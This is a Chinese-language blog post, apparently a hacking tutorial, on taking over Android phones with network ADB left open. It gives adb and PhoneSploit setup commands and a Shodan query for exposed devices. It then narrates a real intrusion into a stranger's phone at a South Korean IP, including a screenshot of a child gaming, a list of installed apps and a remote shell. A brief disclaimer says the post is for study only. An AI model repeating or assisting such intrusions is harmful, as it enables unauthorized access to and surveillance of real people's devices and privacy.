Android设备调式模式利用

Android 调试模式 (adb) 一般情况下，是没有开启的。adb 通过 USB 与设备进行通信，但是也可以开启WIFI进行连接手机，进行远程的调试。由于开启了链接wifi的调试，从而被黑客利用并监控你的手机的所有行为。

下面我们来演示一下如何利用adb入侵Android手机
首先我们需要两个工具： adb 和 PhoneSploit
kali 安装 adb 工具 ：

apt-get install adb adb tcpip 5555 adb connect 1.1.1.1（测试机可以省略，只要用来测试adb是否正常）

kali 安装 PhoneSploit：

git clone https://github.com/Zucccs/PhoneSploit cd PhoneSploit pip install colorama

工具装好之后，我们打开shodan搜一波，搜索关键字为：android debug bridge product:”Android Debug Bridge”

能搜出来好多，我这里就截一点图，然后我们拿那个韩国的IP做一个测试
首先，测试一下它的5555端口是不是正常开启的

可以看到是正常开启的，那接下来，我们启动工具,启动命令为python main_linux.py连接这个IP地址，如下图

可以看到连接成功

接下来，这个工具有一堆的菜单功能

通过输入对应的数字，就能调用功能，这里我们试试截屏，键入7，可以看到，已经成功，并将截屏保存在了工具所在的目录下

我们打开文件看一下

发现熊孩子在打游戏，我们还可以看看这台设备都安装了哪些APP，键入14

可以看到有一堆的APP，当然还有很多功能，功能菜单有两页， 按p键可以翻页、b键可以回到第一页
我们也可以直接进入设备的shell中，键入4，进入shell

可以执行系统命令

当然，只要你的姿势够骚，还有更有意思的玩法这里就不细说了
最后的结语：不要随便去搞破坏，只是提醒大家不要随便开启自己的调式模式，本文只用于学习研究，不能用于非法用途，否则后果自负。。。。

http://www.oniont.cn/index.php/archives/267.html